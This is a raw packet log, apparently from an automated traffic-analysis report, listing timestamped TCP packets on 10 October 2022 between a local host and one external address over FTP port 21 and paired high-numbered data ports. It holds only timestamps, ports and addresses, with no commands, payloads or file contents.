                                                                                                                                    Oct 10, 2022 06:02:53.259040117 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.259141922 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.284348011 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.284501076 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.284671068 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.309365034 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.309623003 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.309819937 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.333592892 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.333836079 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.334072113 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.358297110 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.358520985 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.359260082 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.383930922 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.384123087 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.385252953 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.411017895 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.411201000 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.411505938 CEST4984464592192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.435245037 CEST6459249844185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.435431004 CEST4984464592192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.436043024 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.461563110 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.461815119 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.462485075 CEST4984464592192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.486731052 CEST6459249844185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.486762047 CEST6459249844185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.486922026 CEST4984464592192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.487135887 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.487243891 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.487447023 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.513663054 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.513731956 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.513871908 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.639308929 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.665724039 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.666073084 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.695180893 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.695241928 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.695415020 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.695439100 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.695530891 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.695837975 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.722632885 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.722762108 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.722963095 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.750181913 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.750432968 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.750776052 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.777276039 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.777538061 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.777692080 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.804898024 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.805294037 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.805908918 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.831756115 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.831968069 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.834012032 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.860450029 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.860601902 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.860977888 CEST4984664594192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.883666039 CEST6459449846185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.883838892 CEST4984664594192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.884397030 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.912930965 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.913160086 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.915442944 CEST4984664594192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.938010931 CEST6459449846185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.938071012 CEST6459449846185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.938154936 CEST4984664594192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.940447092 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.940512896 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.940711975 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.965457916 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.965517044 CEST2149845185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.965596914 CEST4984521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.098953962 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.122148991 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.122318983 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.148822069 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.148866892 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.148905039 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.149002075 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.149002075 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.149002075 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.149152040 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.172171116 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.172353983 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.172590017 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.195616007 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.195904016 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.196108103 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.219247103 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.219377041 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.219734907 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.243223906 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.243442059 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.244350910 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.267815113 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.268007994 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.273618937 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.297326088 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.297477961 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.297709942 CEST4984864595192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.320424080 CEST6459549848185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.320672989 CEST4984864595192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.320856094 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.344846010 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.345032930 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.345663071 CEST4984864595192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.367991924 CEST6459549848185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.368221045 CEST6459549848185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.368311882 CEST4984864595192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.369050026 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.369157076 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.369270086 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.392256021 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.392288923 CEST2149847185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.392592907 CEST4984721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.518738985 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.541831970 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.541956902 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.568092108 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.568119049 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.568233013 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.568233013 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.568265915 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.568331957 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.569969893 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.593153954 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.593249083 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.593393087 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.616589069 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.616727114 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.617088079 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.640192986 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.640698910 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.641040087 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.664263964 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.664483070 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.664863110 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.689058065 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.689296007 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.692949057 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.716666937 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.716799974 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.717035055 CEST4985064596192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.740381956 CEST6459649850185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.740550995 CEST4985064596192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.740814924 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.765811920 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.768003941 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.768912077 CEST4985064596192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.793875933 CEST6459649850185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.793926001 CEST6459649850185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.794034004 CEST4985064596192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.794722080 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.797086000 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.803790092 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.826657057 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.826690912 CEST2149849185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.826816082 CEST4984921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.955679893 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:54.981060982 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:54.981213093 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.010014057 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.010243893 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.010472059 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.010505915 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.010564089 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.010693073 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.036758900 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.036947012 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.037312031 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.063865900 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.066051006 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.066184998 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.092276096 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.092463017 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.092596054 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.119882107 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.120609045 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.128556967 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.157921076 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.158237934 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.159230947 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.185045004 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.185199022 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.185497046 CEST4985264597192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.210108995 CEST6459749852185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.212630987 CEST4985264597192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.212851048 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.239355087 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.242109060 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.242589951 CEST4985264597192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.267752886 CEST6459749852185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.268073082 CEST6459749852185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.268201113 CEST4985264597192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.269659996 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.269742966 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.269851923 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.294189930 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.294229984 CEST2149851185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.294384003 CEST4985121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.424510002 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.447570086 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.447909117 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.473628998 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.473674059 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.473705053 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.473822117 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.473823071 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.473823071 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.473948956 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.497308969 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.497586966 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.497709036 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.520936012 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.521142006 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.521445036 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.544470072 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.546140909 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.546399117 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.570151091 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.573213100 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.581579924 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.604881048 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.605015039 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.606050014 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.629812956 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.629916906 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.630204916 CEST4985464599192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.653119087 CEST6459949854185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.653312922 CEST4985464599192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.653860092 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.677217007 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.677644014 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.677963018 CEST4985464599192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.700776100 CEST6459949854185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.700949907 CEST6459949854185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.701028109 CEST4985464599192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.701322079 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.701401949 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.701761961 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.724657059 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.724730015 CEST2149853185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.724920988 CEST4985321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.830714941 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.853574038 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.853852034 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.880469084 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.880553007 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.880717039 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.881042004 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.881114960 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.881145954 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.881218910 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.904349089 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.904448032 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.904577971 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.927581072 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.927700996 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.927820921 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.950773954 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.950983047 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.951081038 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.974683046 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.974988937 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.975229025 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:55.998334885 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:55.998528004 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.003174067 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.027060032 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.027235985 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.027606964 CEST4985664600192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.051225901 CEST6460049856185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.051366091 CEST4985664600192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.051799059 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.076025963 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.076189995 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.076991081 CEST4985664600192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.102118969 CEST6460049856185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.102221012 CEST6460049856185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.102368116 CEST4985664600192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.103251934 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.103446960 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.103528023 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.126208067 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.126302004 CEST2149855185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.126485109 CEST4985521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.244277000 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.266798019 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.266942024 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.294404984 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.294495106 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.294523001 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.294591904 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.294991970 CEST2149857185.106.92.60192.168.2.3
